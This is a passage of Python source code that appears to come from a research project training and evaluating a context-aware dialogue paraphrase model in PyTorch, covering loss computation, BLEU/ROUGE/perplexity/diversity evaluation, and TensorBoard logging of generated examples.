list(), "acc_style": list(), "context_style_mu": list(), "context_style_sigma": list(), "par_style_mu": list(), "par_style_sigma": list(), "slots_word_dist": list()} for proto_index in range(self.model.encoder_module.num_prototypes): self.summary_dict["proto_%i_attn" % proto_index] = list() self.summary_dict["proto_%i_context_attn" % proto_index] = list() def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug, num_context_turns=get_param_val(self.model_params, "num_context_turns", 2)) self.gen_batch = self.val_dataset.get_random_batch(16 if not self.debug else 2, toTorch=False, label_lengths=True, noun_mask=True, mask_prob=0.0) self.val_dataset.reset_index() self.id2word = get_id2word_dict() self.generated_before = False def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." 
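        # Note: the step below runs both paraphrase directions through the model and
        # combines several terms into final_loss: the reconstruction loss, the slot loss,
        # a VAE/KL term weighted by self.KL_scheduler, cosine-similarity terms on the
        # semantic embeddings weighted by cosine_loss_scaling, and a style loss weighted
        # by self.style_loss_scheduler.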
par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True) current_tf_ratio = self._get_tf_ratio(iteration) use_tf = (random() < current_tf_ratio) par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) par_1_res, par_2_res, context_1_style, context_2_style, par_1_style, par_2_style, par_semantics, _, _, proto_dists = self.model(_input = (par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing = True, teacher_forcing_ratio = current_tf_ratio, switch_rate = self.switch_rate, semantic_full_dropout = self.semantic_full_dropout, additional_supervision = False, use_semantic_specific_attn = self.use_semantic_specific_attn, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)) loss_1, loss_slots_1, loss_VAE_1, acc_1, acc_slots_1 = self._calculate_loss(par_1_res, par_1_words, par_1_masks, context_1_style, par_1_style) loss_2, loss_slots_2, loss_VAE_2, acc_2, acc_slots_2 = self._calculate_loss(par_2_res, par_2_words, par_2_masks, context_2_style, par_2_style) loss_style, acc_style = self.loss_module_style(context_1_style, context_2_style, par_1_style, par_2_style, proto_dists) loss = (loss_1 + loss_2) / 2.0 loss_slots = (loss_slots_1 + loss_slots_2) / 2.0 loss_VAE = (loss_VAE_1 + loss_VAE_2) / 2.0 loss_cosine_to_others = (F.cosine_similarity(par_semantics[0].unsqueeze(dim=0), par_semantics[1].unsqueeze(dim=1), dim=-1)) * (1 - torch.eye(par_semantics[0].size(0), device=par_semantics[0].device)) loss_cosine_to_others = loss_cosine_to_others.sum() / (1.0 * par_semantics[0].size(0) * (par_semantics[0].size(0)-1)) loss_cos = (1 - F.cosine_similarity(par_semantics[0], par_semantics[1], dim=-1)).mean() euclidean_dist_to_others = euclidean_distance(par_semantics[0].unsqueeze(dim=0), par_semantics[1].unsqueeze(dim=1)) * (1 - torch.eye(par_semantics[0].size(0), device=par_semantics[0].device)) euclidean_dist_to_others = euclidean_dist_to_others.sum() / (1.0 * par_semantics[0].size(0) * (par_semantics[0].size(0)-1)) euclidean_dist = euclidean_distance(par_semantics[0], par_semantics[1]).mean() acc = (acc_1 + acc_2) / 2.0 acc_slots = (acc_slots_1 + acc_slots_2) / 2.0 final_loss = loss + \ loss_slots + \ loss_VAE * self.KL_scheduler.get(iteration) + \ loss_cos * self.cosine_loss_scaling + \ ((loss_cosine_to_others * self.cosine_loss_scaling / 2.0) if self.cosine_counter_loss else 0.0) + \ loss_style * self.style_loss_scheduler.get(iteration) if self.pure_style_loss: final_loss = loss_style self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_slots"].append(loss_slots.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["loss_style"].append(loss_style.item()) self.summary_dict["KL_scheduler"] = [self.KL_scheduler.get(iteration)] self.summary_dict["style_loss_scheduler"] = [self.style_loss_scheduler.get(iteration)] self.summary_dict["loss_cosine"].append(loss_cos.item()) self.summary_dict["loss_cosine_to_others"].append(loss_cosine_to_others.item()) self.summary_dict["euclidean_dist"].append(euclidean_dist.item()) 
self.summary_dict["euclidean_dist_to_others"].append(euclidean_dist_to_others.item()) self.summary_dict["acc_slots"].append(acc_slots.item()) self.summary_dict["acc_style"].append(acc_style.item()) self.summary_dict["loss_combined"].append(final_loss.item()) hist_summary_values = { "slots_word_dist": ([par_1_res[1][:,:,0], par_2_res[1][:,:,0]], None, 10), "context_style_mu": ([context_1_style[1], context_2_style[1]], 10, 10), "context_style_sigma": ([context_1_style[2], context_2_style[2]], 2, 10), "par_style_mu": ([par_1_style[1], par_2_style[1]], 10, 10), "par_style_sigma": ([par_1_style[2], par_2_style[2]], 2, 10) } if self.model.encoder_module.use_prototype_styles: for proto_index in range(proto_dists[0].size(1)): hist_summary_values["proto_%i_attn" % proto_index] = ([proto_dists[0][:,proto_index], proto_dists[1][:,proto_index]], None, 50) if not self.model.encoder_module.no_prototypes_for_context: hist_summary_values["proto_%i_context_attn" % proto_index] = ([proto_dists[2][:,proto_index], proto_dists[3][:,proto_index]], None, 50) for dict_key, dict_vals in hist_summary_values.items(): hist_tensors, max_val, max_list_len = dict_vals new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors if t is not None] new_vals = [e for sublist in new_vals for e in sublist] if max_val is not None: new_vals = [max(min(e,max_val),-max_val) for e in new_vals] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > max_list_len: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, par_masks, context_style, par_style=None): par_word_dist, slot_dist, _, _ = par_res # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] par_masks = par_masks[:,1:].contiguous() # First token is SOS else: print("[#] WARNING: Batch labels were not shortend. 
First token ids: \n%s \nSOS index: %i" % (str(batch_labels[:,0]), get_SOS_index())) unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels < 0)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label if par_word_dist.size(0) > batch_labels.size(0) and (par_word_dist.size(0) % batch_labels.size(0) == 0): extend_factor = int(par_word_dist.size(0) / batch_labels.size(0)) batch_labels = batch_labels.repeat(extend_factor, 1) # print("[I] INFO: Extending batch labels by factor %i" % (extend_factor)) if slot_dist.size(0) > par_masks.size(0) and (slot_dist.size(0) % par_masks.size(0) == 0): extend_factor = int(slot_dist.size(0) / par_masks.size(0)) par_masks = par_masks.repeat(extend_factor, 1) # print("[I] INFO: Extending paraphrase masks by factor %i" % (extend_factor)) ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) slot_dist = torch.log(slot_dist + (slot_dist == 0).float()) loss_slots = self.loss_module_slots(slot_dist.view(-1, slot_dist.shape[-1]), par_masks.view(-1)) loss_slots[torch.isnan(loss_slots)] = 0 loss_slots = loss_slots * (par_masks.view(-1) >= 0).float() loss_slots = loss_slots.sum() / (par_masks >= 0).float().sum() ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() _, pred_slots = torch.max(slot_dist, dim=-1) acc_slots = torch.sum((pred_slots == par_masks) & (pred_slots > 0)).float() / (torch.sum(par_masks > 0).float() + 1e-10) ## Loss VAE regularization _, style_mu, style_std = context_style loss_VAE = ContextAwareDialogueTask._calc_loss_VAE(style_mu, style_std) if par_style is not None: _, par_style_mu, par_style_std = par_style if par_style_mu is not None and par_style_std is not None: loss_VAE = loss_VAE / 2.0 + ContextAwareDialogueTask._calc_loss_VAE(par_style_mu, par_style_std) / 2.0 return loss, loss_slots, loss_VAE, acc, acc_slots @staticmethod def _calc_loss_VAE(mu, std): if mu is None or std is None: return torch.tensor([0.0], dtype=torch.float32).to(get_device()) return torch.mean(- torch.log(std) + (std ** 2 - 1 + mu ** 2) / 2) def _eval_batch(self, batch, use_context_style=False, perform_beamsearch=False): par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) p1_res, p2_res, context_1_style, context_2_style, par_1_style, par_2_style, _, _, _, proto_dists = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=True, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=use_context_style, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)) p1_perplexity_probs, _, _, _ = p1_res p2_perplexity_probs, _, _, _ = p2_res p1_perplexity_probs = p1_perplexity_probs.detach() p2_perplexity_probs = p2_perplexity_probs.detach() del p1_res del p2_res _, acc_style = 
self.loss_module_style(context_1_style, context_2_style, par_1_style, par_2_style, proto_dists) acc_style = acc_style.detach() p1_res_tf, p2_res_tf, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=50, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=use_context_style, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)) _, _, p1_generated_words, p1_generated_lengths = p1_res_tf _, _, p2_generated_words, p2_generated_lengths = p2_res_tf p1_generated_words = p1_generated_words.detach() p1_generated_lengths = p1_generated_lengths.detach() p2_generated_words = p2_generated_words.detach() p2_generated_lengths = p2_generated_lengths.detach() del p1_res_tf del p2_res_tf if perform_beamsearch: start_time = time.time() p1_res_beam, _, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, beams=8, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=40, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=use_context_style, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0), only_par_1=True) _, _, p1_generated_words_beam, p1_generated_lengths_beam = p1_res_beam p1_generated_words_beam = p1_generated_words_beam.detach() p1_generated_lengths_beam = p1_generated_lengths_beam.detach() del p1_res_beam print("Completed beam search in %ss" % str(time.time() - start_time)) else: p1_generated_words_beam, p1_generated_lengths_beam = None, None subbatches = 4 subbatch_size = int(par_1_words.size(0) / subbatches) all_generated_words_styles, all_generated_lengths_styles = {"sample_all": [], "sample_gt": [], "sample_context": []}, {"sample_all": [], "sample_gt": [], "sample_context": []} for subbatch_index in range(subbatches): bstart, bend = int(subbatch_index*subbatch_size), int((subbatch_index+1)*subbatch_size) for samp_cont, samp_gt, name in zip([True, True, False], [True, False, True], ["sample_all", "sample_context", "sample_gt"]): _, _, p1_generated_words_styles, p1_generated_lengths_styles = self.model.sample_reconstruction_styles((par_1_words[bstart:bend], par_1_lengths[bstart:bend], par_1_masks[bstart:bend], par_1_slots[bstart:bend], par_1_slot_lengths[bstart:bend], contexts_1_words[bstart:bend], contexts_1_lengths[bstart:bend]), num_samples=8, max_generation_steps=50, sample_gt=samp_gt, sample_context=samp_cont) p1_generated_words_styles = p1_generated_words_styles.detach() p1_generated_lengths_styles = p1_generated_lengths_styles.detach() all_generated_words_styles[name].append(p1_generated_words_styles) all_generated_lengths_styles[name].append(p1_generated_lengths_styles) p1_generated_lengths_styles = {k: torch.cat(val, dim=0) for k, val in all_generated_lengths_styles.items()} max_gen_len = {k: max([t.size(2) for t in val]) for k, val in all_generated_words_styles.items()} all_generated_words_styles = {k: [t if t.size(2) >= max_gen_len[k] else 
torch.cat([t, t.new_zeros(t.size(0), t.size(1), max_gen_len[k]-t.size(2))], dim=2) for t in val] for k, val in all_generated_words_styles.items()} p1_generated_words_styles = {k: torch.cat(val, dim=0) for k, val in all_generated_words_styles.items()} # Remove unknown word labels from the evaluation batch_labels = par_1_words if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels == -1)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label return batch_labels, p1_perplexity_probs, p1_generated_words, p1_generated_lengths, p1_generated_words_styles, p1_generated_lengths_styles, p1_generated_words_beam, p1_generated_lengths_beam, acc_style def eval(self, dataset=None, batch_size=64, label_lengths=False, noun_mask=False): # Default: if no dataset is specified, we use validation dataset self.eval_counter += 1 if dataset is None: assert self.val_dataset is not None, "[!] ERROR: Validation dataset not loaded. Please load the dataset beforehand for evaluation." dataset = self.val_dataset self.model.eval() if not self.debug: batch_size = 128 # Prepare metrics number_batches = int(math.ceil(dataset.get_num_examples() * 1.0 / batch_size)) if self.debug: number_batches = min(8, number_batches) perplexity, perplexity_context = [], [] acc_style = 0 hypotheses, references = None, None hypotheses_context, references_context = None, None hypotheses_styles, hypotheses_styles_gt, hypotheses_styles_context, hypotheses_beams = None, None, None, None # Evaluation loop for batch_ind in range(number_batches): if debug_level() == 0: print("Evaluation process: %4.2f%% (batch %i of %i)" % (100.0 * batch_ind / number_batches, batch_ind+1, number_batches), end="\r") # Evaluate single batch with torch.no_grad(): batch = dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=label_lengths, noun_mask=noun_mask, mask_prob=0.0) batch_labels, perplexity_logits, generated_words, generated_lengths, generated_words_styles, generated_lengths_styles, generated_words_beams, generated_lengths_beams, loc_acc_style = self._eval_batch(batch, perform_beamsearch=False and (batch_ind < 4) and ((self.eval_counter % 5) == 1)) if True or not (self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)): _, perplexity_logits_context, generated_words_context, generated_lengths_context, _, _, _, _, _ = self._eval_batch(batch, use_context_style=True, perform_beamsearch=False) else: perplexity_logits_context = perplexity_logits generated_words_context = generated_words generated_lengths_context = generated_lengths # Perplexity calculation perplexity += TaskTemplate._eval_preplexity(perplexity_logits, batch_labels).cpu().numpy().tolist() perplexity_context += TaskTemplate._eval_preplexity(perplexity_logits_context, batch_labels).cpu().numpy().tolist() acc_style += loc_acc_style.item() hypotheses, references = add_if_not_none(TaskTemplate._preds_to_sents(batch_labels, generated_words, generated_lengths), (hypotheses, references)) hypotheses_context, references_context = add_if_not_none(TaskTemplate._preds_to_sents(batch_labels, generated_words_context, generated_lengths_context), (hypotheses_context, references_context)) hypotheses_styles = add_if_not_none(TaskTemplate._reconst_sents(generated_words_styles["sample_all"], generated_lengths_styles["sample_all"]), hypotheses_styles) hypotheses_styles_gt = 
add_if_not_none(TaskTemplate._reconst_sents(generated_words_styles["sample_gt"], generated_lengths_styles["sample_gt"]), hypotheses_styles_gt) hypotheses_styles_context = add_if_not_none(TaskTemplate._reconst_sents(generated_words_styles["sample_context"], generated_lengths_styles["sample_context"]), hypotheses_styles_context) if generated_words_beams is not None: hypotheses_beams = add_if_not_none(TaskTemplate._reconst_sents(generated_words_beams, generated_lengths_beams), hypotheses_beams) BLEU_score, prec_per_ngram = get_BLEU_score(hypotheses, references) BLEU_score_context, prec_per_ngram_context = get_BLEU_score(hypotheses_context, references_context) ROUGE_score = get_ROUGE_score(hypotheses, references) ROUGE_score_context = get_ROUGE_score(hypotheses_context, references_context) # Metric output avg_perplexity = sum(perplexity) / len(perplexity) avg_perplexity_context = sum(perplexity_context) / len(perplexity_context) median_perplexity = median(perplexity) unigram_variety, unigram_entropy = get_diversity_measure(hypotheses, n_gram=1) bigram_variety, bigram_entropy = get_diversity_measure(hypotheses, n_gram=2) unigram_variety_context, unigram_entropy_context = get_diversity_measure(hypotheses_context, n_gram=1) bigram_variety_context, bigram_entropy_context = get_diversity_measure(hypotheses_context, n_gram=2) unigram_variety_gt, unigram_entropy_gt = get_diversity_measure(references, n_gram=1) bigram_variety_gt, bigram_entropy_gt = get_diversity_measure(references, n_gram=2) unigram_variety_style, unigram_entropy_style = get_diversity_measure(hypotheses_styles, n_gram=1) bigram_variety_style, bigram_entropy_style = get_diversity_measure(hypotheses_styles, n_gram=2) unigram_variety_style_gt, unigram_entropy_style_gt = get_diversity_measure(hypotheses_styles_gt, n_gram=1) bigram_variety_style_gt, bigram_entropy_style_gt = get_diversity_measure(hypotheses_styles_gt, n_gram=2) unigram_variety_style_context, unigram_entropy_style_context = get_diversity_measure(hypotheses_styles_context, n_gram=1) bigram_variety_style_context, bigram_entropy_style_context = get_diversity_measure(hypotheses_styles_context, n_gram=2) if hypotheses_beams is None: unigram_variety_beams, unigram_entropy_beams, bigram_variety_beams, bigram_entropy_beams = 0.0, 0.0, 0.0, 0.0 else: unigram_variety_beams, unigram_entropy_beams = get_diversity_measure(hypotheses_beams, n_gram=1) bigram_variety_beams, bigram_entropy_beams = get_diversity_measure(hypotheses_beams, n_gram=2) acc_style = acc_style / number_batches if self.semantic_full_dropout_eval == 1.0 and self.model.style_full_dropout == 1.0: # assert avg_perplexity == avg_perplexity_context, "[!] ERROR: Context perplexity is different from normal: %f vs %f" % (avg_perplexity, avg_perplexity_context) assert BLEU_score == BLEU_score_context, "[!] ERROR: BLEU scores with/without context is different although full dropout is applied: %f vs %f" % (BLEU_score, BLEU_score_context) assert all([r == r_c for r, r_c in zip(references, references_context)]), "[!] ERROR: References do not match" for p, p_c in zip(hypotheses, hypotheses_context): if p != p_c: print("-"*50+"\nPredictions do not fit.\nPrediction 1: %s\nPrediction 2: %s\n" % (str(p), str(p_c))+"-"*50) assert all([p == p_c for p, p_c in zip(hypotheses, hypotheses_context)]), "[!] ERROR: Hypotheses/predictions do not match" assert bigram_entropy_context == bigram_entropy, "[!] 
ERROR: Entropy for bigram differ" detailed_metrics = { "perplexity": avg_perplexity, "perplexity_context": avg_perplexity_context, "perplexity_median": median_perplexity, "diversity_unigram_entropy": unigram_entropy, "diversity_bigram_entropy": bigram_entropy, "diversity_unigram": unigram_variety, "diversity_bigram": bigram_variety, "diversity_unigram_entropy_context": unigram_entropy_context, "diversity_bigram_entropy_context": bigram_entropy_context, "diversity_unigram_context": unigram_variety_context, "diversity_bigram_context": bigram_variety_context, "diversity_unigram_entropy_gt": unigram_entropy_gt, "diversity_bigram_entropy_gt": bigram_entropy_gt, "diversity_unigram_gt": unigram_variety_gt, "diversity_bigram_gt": bigram_variety_gt, "diversity_unigram_style": unigram_variety_style, "diversity_bigram_style": bigram_variety_style, "diversity_unigram_entropy_style": unigram_entropy_style, "diversity_bigram_entropy_style": bigram_entropy_style, "diversity_unigram_style_gt": unigram_variety_style_gt, "diversity_bigram_style_gt": bigram_variety_style_gt, "diversity_unigram_entropy_style_gt": unigram_entropy_style_gt, "diversity_bigram_entropy_style_gt": bigram_entropy_style_gt, "diversity_unigram_style_context": unigram_variety_style_context, "diversity_bigram_style_context": bigram_variety_style_context, "diversity_unigram_entropy_style_context": unigram_entropy_style_context, "diversity_bigram_entropy_style_context": bigram_entropy_style_context, "diversity_unigram_beams": unigram_variety_beams, "diversity_bigram_beams": bigram_variety_beams, "diversity_unigram_entropy_beams": unigram_entropy_beams, "diversity_bigram_entropy_beams": bigram_entropy_beams, "BLEU": BLEU_score, "BLEU_context": BLEU_score_context, "acc_style": acc_style } for n in range(len(prec_per_ngram)): detailed_metrics["BLEU_%i-gram" % (n+1)] = float(prec_per_ngram[n]) for metric, results in ROUGE_score.items(): if metric[-1] in ["1", "2", "3", "4"]: continue for sub_category, val in results.items(): detailed_metrics[metric + "_" + sub_category] = val self.model.train() dataset.reset_index() return BLEU_score_context, detailed_metrics def add_summary(self, writer, iteration): # TODO: Add some example generations here. 
Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: if self.debug or iteration % 5000 == 0: # Histograms can take time to be exported val = [v for sublist in val for v in sublist] if len(val) == 0: continue writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() if self.debug or iteration % 5000 == 0: gen_list = self.generate_examples() for i in range(min(4, len(gen_list))): if not self.generated_before: writer.add_text(self.name + "_gen%i_input_phrase" % (i), gen_list[i][0], iteration) writer.add_text(self.name + "_gen%i_input_labels" % (i), gen_list[i][1], iteration) writer.add_text(self.name + "_gen%i_input_contexts" % (i), gen_list[i][2], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase" % (i), gen_list[i][3], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase_context" % (i), gen_list[i][4], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase_tf" % (i), gen_list[i][5], iteration) gen_list = self.generate_random_style_samples() for i in range(min(4, len(gen_list))): if not self.generated_before: writer.add_text(self.name + "_samp%i_input_phrase" % (i), gen_list[i][0], iteration) for j in range(len(gen_list[i][1])): writer.add_text(self.name + "_samp%i_sample_%i" % (i, j), gen_list[i][1][j], iteration) self.generate_slot_dist_images(writer, iteration) self.generated_before = True def generate_examples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) # 2.) 
Push data through network par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): par_1_res, par_2_res, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn=self.use_semantic_specific_attn) par_1_res_context, par_2_res_context, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn=self.use_semantic_specific_attn, use_context_style=True) par_1_res_tf, par_2_res_tf, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=True, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn=self.use_semantic_specific_attn) del batch_torch # 3.) 
Reconstruct generated answer and input generated_paraphrases = list() generated_paraphrases_context = list() generated_paraphrases_tf = list() input_phrases = list() input_labels = list() input_contexts = list() gen_par_1_UNKdist = par_1_res[1].cpu().numpy() gen_par_1_words = par_1_res[2].cpu().numpy() gen_par_1_lengths = par_1_res[3].cpu().numpy() gen_par_2_UNKdist = par_2_res[1].cpu().numpy() gen_par_2_words = par_2_res[2].cpu().numpy() gen_par_2_lengths = par_2_res[3].cpu().numpy() gen_par_1_context_UNKdist = par_1_res_context[1].cpu().numpy() gen_par_1_context_words = par_1_res_context[2].cpu().numpy() gen_par_1_context_lengths = par_1_res_context[3].cpu().numpy() gen_par_2_context_UNKdist = par_2_res_context[1].cpu().numpy() gen_par_2_context_words = par_2_res_context[2].cpu().numpy() gen_par_2_context_lengths = par_2_res_context[3].cpu().numpy() gen_par_1_words_tf = par_1_res_tf[2].cpu().numpy() gen_par_1_lengths_tf = par_1_res_tf[3].cpu().numpy() gen_par_2_words_tf = par_2_res_tf[2].cpu().numpy() gen_par_2_lengths_tf = par_2_res_tf[3].cpu().numpy() par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = self.gen_batch for embeds, lengths, list_to_add, slot_vals, slot_lengths, slot_preds in zip([contexts_1_words, contexts_2_words, par_1_words if eval_swr == 0 else par_2_words, par_2_words if eval_swr == 0 else par_1_words, par_1_words, par_2_words, gen_par_1_words, gen_par_2_words, gen_par_1_context_words, gen_par_2_context_words, gen_par_1_words_tf, gen_par_2_words_tf], [contexts_1_lengths, contexts_2_lengths, par_1_lengths if eval_swr == 0 else par_2_lengths, par_2_lengths if eval_swr == 0 else par_1_lengths, par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths, gen_par_1_context_lengths, gen_par_2_context_lengths, gen_par_1_lengths_tf, gen_par_2_lengths_tf], [input_contexts, input_contexts, input_phrases, input_phrases, input_labels, input_labels, generated_paraphrases, generated_paraphrases, generated_paraphrases_context, generated_paraphrases_context, generated_paraphrases_tf, generated_paraphrases_tf], [None, None, par_1_slots if eval_swr == 0 else par_2_slots, par_2_slots if eval_swr == 0 else par_1_slots, par_1_slots, par_2_slots, par_1_slots, par_2_slots, par_1_slots, par_2_slots, None, None], [None, None, par_1_slot_lengths if eval_swr == 0 else par_2_slot_lengths, par_2_slot_lengths if eval_swr == 0 else par_1_slot_lengths, par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths, None, None], [None, None, None, None, None, None, gen_par_1_UNKdist[:,:,1:], gen_par_2_UNKdist[:,:,1:], gen_par_1_context_UNKdist[:,:,1:], gen_par_2_context_UNKdist[:,:,1:], None, None]): reconstruct_sentences(embeds, lengths, slot_vals=slot_vals, slot_lengths=slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, input_labels, input_contexts, generated_paraphrases, generated_paraphrases_context, generated_paraphrases_tf)) self.model.train() return gen_list def generate_random_style_samples(self): self.model.eval() # 1.) 
Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) par_words, par_lengths, _, _, par_slots, par_slot_lengths, _, _, context_words, context_lengths, _, _ = batch_torch par_masks = self.model.embedding_module.generate_mask(par_words) with torch.no_grad(): _, gen_par_UNK_weigths, gen_par_words, gen_par_lengths = self.model.sample_reconstruction_styles((par_words, par_lengths, par_masks, par_slots, par_slot_lengths, context_words, context_lengths), num_samples=8) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_UNK_weigths = gen_par_UNK_weigths.cpu().numpy() gen_par_words = gen_par_words.cpu().numpy() gen_par_lengths = gen_par_lengths.cpu().numpy() par_words = self.gen_batch[0] par_lengths = self.gen_batch[1] par_slots = self.gen_batch[4] par_slot_lengths = self.gen_batch[5] for embeds, lengths, list_to_add, add_sents_up, slot_preds in zip([par_words, gen_par_words], [par_lengths, gen_par_lengths], [input_phrases, generated_paraphrases], [True, False], [None, gen_par_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list def generate_style_dist(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, _, _, _, _ = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths, gen_proto_dists, par_1_proto_dist = self.model.generate_style_dist((par_1_words, par_1_lengths, par_1_masks, par_1_slots, par_1_slot_lengths), max_generation_steps=40) _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths, _, par_2_proto_dist = self.model.generate_style_dist((par_2_words, par_2_lengths, par_2_masks, par_2_slots, par_2_slot_lengths), max_generation_steps=40) del batch_torch # 3.) 
